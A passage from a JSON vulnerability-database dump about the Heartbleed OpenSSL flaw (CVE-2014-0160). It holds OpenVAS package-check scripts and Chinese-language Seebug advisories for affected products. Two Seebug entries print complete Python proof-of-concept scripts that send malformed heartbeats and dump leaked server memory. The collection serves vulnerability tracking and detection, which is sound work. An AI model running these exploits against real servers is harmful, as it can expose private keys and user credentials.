are vulnerable.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "description": "The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.", "modified": "2019-03-15T00:00:00", "published": "2014-04-08T00:00:00", "id": "OPENVAS:1361412562310881918", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881918", "type": "openvas", "title": "CentOS Update for openssl CESA-2014:0376 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openssl CESA-2014:0376 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881918\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-08 11:30:13 +0530 (Tue, 08 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"CentOS Update for openssl CESA-2014:0376 centos6\");\n\n script_tag(name:\"affected\", value:\"openssl on CentOS 6\");\n script_tag(name:\"insight\", value:\"OpenSSL is a toolkit that implements the Secure Sockets Layer\n(SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"CESA\", value:\"2014:0376\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-static\", rpm:\"openssl-static~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2017-11-19T17:27:57", "description": 
"CVE ID:CVE-2014-0160\r\n\r\nVMware\u591a\u4e2a\u4ea7\u54c1\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\r\n\r\nVMware\u591a\u4e2a\u4ea7\u54c1\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nNicira Network Virtualization Platform (NVP) 3.x\r\nVMware ESXi 5.x\r\nVMware NSX 4.x\r\nVMware NSX 6.x\r\nVMware Fusion 6.x\r\nVmware Horizon Mirage 4.x\r\nVMware Horizon View 5.x\r\nVMware Horizon View Client 2.x\r\nVMware Horizon Workspace 1.x\r\nVMware OVF Tool 3.x\r\nVMware vCenter Server 5.x\r\nVMware vCloud Networking and Security (vCNS) 5.x\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.vmware.com", "published": "2014-04-16T00:00:00", "title": "VMware\u591a\u4e2a\u4ea7\u54c1OpenSSL TLS/DTLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62199", "id": "SSV:62199", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:28:38", "description": "CVE ID:CVE-2014-0160\r\n\r\nOpenSSL\u662f\u4e00\u79cd\u5f00\u653e\u6e90\u7801\u7684SSL\u5b9e\u73b0\uff0c\u7528\u6765\u5b9e\u73b0\u7f51\u7edc\u901a\u4fe1\u7684\u9ad8\u5f3a\u5ea6\u52a0\u5bc6\uff0c\u73b0\u5728\u88ab\u5e7f\u6cdb\u5730\u7528\u4e8e\u5404\u79cd\u7f51\u7edc\u5e94\u7528\u7a0b\u5e8f\u4e2d\u3002\r\n\r\n\u7531\u4e8e\u5904\u7406TLS 
heartbeat\u6269\u5c55\u65f6\u7684\u8fb9\u754c\u9519\u8bef\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u62ab\u9732\u8fde\u63a5\u7684\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5b58\u50a8\u5668\u5185\u5bb9\u3002\r\n0\r\nOpenSSL 1.0.2-beta\r\nOpenSSL 1.0.1\r\nOpenSSL 1.0.1g\u7248\u672c\u4ee5\u4fee\u590d\u6b64\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u5347\u7ea7\u4f7f\u7528\uff1a\r\nhttp://www.openssl.org/", "published": "2014-04-08T00:00:00", "title": "OpenSSL TLS Hearbeat\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62086", "id": "SSV:62086", "sourceData": "\n #!/usr/bin/python\r\n\r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\r\n# The author disclaims copyright to this source code.\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n\r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 
07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01 \r\n''')\r\n\r\nhb = h2bin(''' \r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n\r\ndef hexdump(s):\r\n for b in xrange(0, len(s), 16):\r\n lin = [c for c in s[b : b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n\r\ndef recvall(s, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time() \r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([s], [], [], 5)\r\n if s in r:\r\n data = s.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n \r\n\r\ndef recvmsg(s):\r\n hdr = recvall(s, 5)\r\n if hdr is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n typ, ver, ln = struct.unpack('>BHH', hdr)\r\n pay = recvall(s, ln, 10)\r\n if pay is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n print ' ... 
received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return typ, ver, pay\r\n\r\ndef hit_hb(s):\r\n s.send(hb)\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n\r\n if typ == 24:\r\n print 'Received heartbeat response:'\r\n hexdump(pay)\r\n if len(pay) > 3:\r\n print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n\r\n if typ == 21:\r\n print 'Received alert:'\r\n hexdump(pay)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n\r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print 'Connecting...'\r\n sys.stdout.flush()\r\n s.connect((args[0], opts.port))\r\n print 'Sending Client Hello...'\r\n sys.stdout.flush()\r\n s.send(hello)\r\n print 'Waiting for Server Hello...'\r\n sys.stdout.flush()\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ == None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if typ == 22 and ord(pay[0]) == 0x0E:\r\n break\r\n\r\n print 'Sending heartbeat request...'\r\n sys.stdout.flush()\r\n s.send(hb)\r\n hit_hb(s)\r\n\r\nif __name__ == '__main__':\r\n main()\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-62086"}, {"lastseen": "2017-11-19T13:55:16", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": 
"2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86038", "id": "SSV:86038", "sourceData": "\n # Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]\r\n# Date: [2014-04-09]\r\n# Exploit Author: [Csaba Fitzl]\r\n# Vendor Homepage: [http://www.openssl.org/]\r\n# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]\r\n# Version: [1.0.1f]\r\n# Tested on: [N/A]\r\n# CVE : [2014-0160]\r\n\r\n\r\n#!/usr/bin/env python\r\n\r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\r\n# The author disclaims copyright to this source code.\r\n# Modified by Csaba Fitzl for multiple SSL / TLS version support\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n\r\ndef h2bin(x):\r\n\treturn x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nversion = []\r\nversion.append(['SSL 3.0','03 00'])\r\nversion.append(['TLS 1.0','03 01'])\r\nversion.append(['TLS 1.1','03 02'])\r\nversion.append(['TLS 1.2','03 03'])\r\n\r\ndef create_hello(version):\r\n\thello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 
0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n\treturn hello\r\n\r\ndef create_hb(version):\r\n\thb = h2bin('18 ' + version + ' 00 03 01 40 00')\r\n\treturn hb\r\n\r\ndef hexdump(s):\r\n\tfor b in xrange(0, len(s), 16):\r\n\t\tlin = [c for c in s[b : b + 16]]\r\n\t\thxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n\t\tpdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n\t\tprint ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n\tprint\r\n\r\ndef recvall(s, length, timeout=5):\r\n\tendtime = time.time() + timeout\r\n\trdata = ''\r\n\tremain = length\r\n\twhile remain > 0:\r\n\t\trtime = endtime - time.time()\r\n\t\tif rtime < 0:\r\n\t\t\treturn None\r\n\t\tr, w, e = select.select([s], [], [], 5)\r\n\t\tif s in r:\r\n\t\t\tdata = s.recv(remain)\r\n\t\t\t# EOF?\r\n\t\t\tif not data:\r\n\t\t\t\treturn None\r\n\t\t\trdata += data\r\n\t\t\tremain -= len(data)\r\n\treturn rdata\r\n\r\n\r\ndef recvmsg(s):\r\n\thdr = recvall(s, 5)\r\n\tif hdr is None:\r\n\t\tprint 'Unexpected EOF receiving record header - server closed connection'\r\n\t\treturn None, None, None\r\n\ttyp, ver, ln = struct.unpack('>BHH', hdr)\r\n\tpay = recvall(s, ln, 10)\r\n\tif pay is None:\r\n\t\tprint 'Unexpected EOF receiving record payload - server closed connection'\r\n\t\treturn None, None, None\r\n\tprint ' ... 
received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n\treturn typ, ver, pay\r\n\r\ndef hit_hb(s,hb):\r\n\ts.send(hb)\r\n\twhile True:\r\n\t\ttyp, ver, pay = recvmsg(s)\r\n\t\tif typ is None:\r\n\t\t\tprint 'No heartbeat response received, server likely not vulnerable'\r\n\t\t\treturn False\r\n\r\n\t\tif typ == 24:\r\n\t\t\tprint 'Received heartbeat response:'\r\n\t\t\thexdump(pay)\r\n\t\t\tif len(pay) > 3:\r\n\t\t\t\tprint 'WARNING: server returned more data than it should - server is vulnerable!'\r\n\t\t\telse:\r\n\t\t\t\tprint 'Server processed malformed heartbeat, but did not return any extra data.'\r\n\t\t\treturn True\r\n\r\n\t\tif typ == 21:\r\n\t\t\tprint 'Received alert:'\r\n\t\t\thexdump(pay)\r\n\t\t\tprint 'Server returned error, likely not vulnerable'\r\n\t\t\treturn False\r\n\r\ndef main():\r\n\topts, args = options.parse_args()\r\n\tif len(args) < 1:\r\n\t\toptions.print_help()\r\n\t\treturn\r\n\tfor i in range(len(version)):\r\n\t\tprint 'Trying ' + version[i][0] + '...'\r\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\tprint 'Connecting...'\r\n\t\tsys.stdout.flush()\r\n\t\ts.connect((args[0], opts.port))\r\n\t\tprint 'Sending Client Hello...'\r\n\t\tsys.stdout.flush()\r\n\t\ts.send(create_hello(version[i][1]))\r\n\t\tprint 'Waiting for Server Hello...'\r\n\t\tsys.stdout.flush()\r\n\t\twhile True:\r\n\t\t\ttyp, ver, pay = recvmsg(s)\r\n\t\t\tif typ == None:\r\n\t\t\t\tprint 'Server closed connection without sending Server Hello.'\r\n\t\t\t\treturn\r\n\t\t\t# Look for server hello done message.\r\n\t\t\tif typ == 22 and ord(pay[0]) == 0x0E:\r\n\t\t\t\tbreak\r\n\r\n\t\tprint 'Sending heartbeat request...'\r\n\t\tsys.stdout.flush()\r\n\t\ts.send(create_hb(version[i][1]))\r\n\t\tif hit_hb(s,create_hb(version[i][1])):\r\n\t\t\t#Stop if vulnerable\r\n\t\t\tbreak\r\n\r\nif __name__ == '__main__':\r\n\tmain()\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": 
"https://www.seebug.org/vuldb/ssvid-86038"}, {"lastseen": "2017-11-19T17:26:49", "description": "CVE ID:CVE-2014-0160\r\n\r\nOpenVPN\u662f\u4e00\u6b3e\u5f00\u6e90VPN\u5b9e\u73b0\u3002\r\n\r\nOpenVPN\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nOpenVPN 2.x\nOpenVPN 2.3.3-I002\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttps://openvpn.net/", "published": "2014-04-21T00:00:00", "title": "OpenVPN OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62239", "id": "SSV:62239", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:27:53", "description": "CVE ID:CVE-2014-0160\r\n\r\nSophos Antivirus\u662f\u4e00\u6b3e\u9632\u75c5\u6bd2\u5e94\u7528\u7a0b\u5e8f\u3002\r\n\r\nSophos Antivirus for vShield\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nSophos Antivirus for vShield 1.0\r\nSophos Antivirus for 
vShield 1.1\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.sophos.com", "published": "2014-04-16T00:00:00", "title": "Sophos Antivirus for vShield OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62197", "id": "SSV:62197", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:53", "description": "CVE ID:CVE-2014-0160\r\n\r\nMcAfee Endpoint Intelligence Agent\u662f\u4e00\u6b3eMcAfee\u4ea7\u54c1\u4e2d\u6240\u4f7f\u7528\u7684\u4e00\u4e2a\u7f51\u7edc\u670d\u52a1\u3002 \r\n\r\nMcAfee Endpoint Intelligence Agent\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nMcAfee Endpoint Intelligence Agent 1.x (Formerly Network Integrity Agent)\nMcAfee Endpoint Intelligence Agent 2.2.1\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.mcafee.com", "published": "2014-04-21T00:00:00", "title": "McAfee Endpoint Intelligence Agent OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62238", "id": "SSV:62238", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, 
{"lastseen": "2017-11-19T17:31:20", "description": "CVE ID:CVE-2014-0160\r\n\r\nSAP Sybase SQL Anywhere\u662f\u4e00\u5957\u5168\u9762\u7684\u89e3\u51b3\u65b9\u6848,\u5b83\u63d0\u4f9b\u4e86\u6570\u636e\u7ba1\u7406\u3001\u540c\u6b65\u548c\u6570\u636e\u4ea4\u6362\u6280\u672f,\u53ef\u5feb\u901f\u5728\u8fdc\u7a0b\u548c\u79fb\u52a8\u73af\u5883\u4e2d\u5f00\u53d1\u5e76\u914d\u7f6e\u6570\u636e\u5e93\u9a71\u52a8\u7684\u5e94\u7528\u7a0b\u5e8f\u3002\r\n\r\nSAP Sybase SQL Anywhere\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nSAP Sybase SQL Anywhere 12.x\r\nSAP Sybase SQL Anywhere 16.x\nSAP Sybase SQL Anywhere 12.01 ebf 4099\u621616.0 ebf 1881\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.sap.com", "published": "2014-04-21T00:00:00", "title": "SAP Sybase SQL Anywhere OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62244", "id": "SSV:62244", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:23", "description": "CVE ID:CVE-2014-0160\r\n\r\nIBM AIX\u662f\u4e00\u6b3e\u5546\u4e1a\u6027\u8d28\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\nIBM 
AIX\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nIBM AIX 6.x\r\nIBM AIX 7.x\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u5382\u5546\u63d0\u4f9b\u7684\u5b89\u5168\u8865\u4e01\u4ee5\u4fee\u590d\u8be5\u6f0f\u6d1e\uff1a\r\nhttp://aix.software.ibm.com/aix/efixes/security/openssl_advisory7.doc\r\nhttp://www14.software.ibm.com/webapp/set2/subscriptions/onvdq?mode=18&ID=3489", "published": "2014-04-16T00:00:00", "title": "IBM AIX OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": 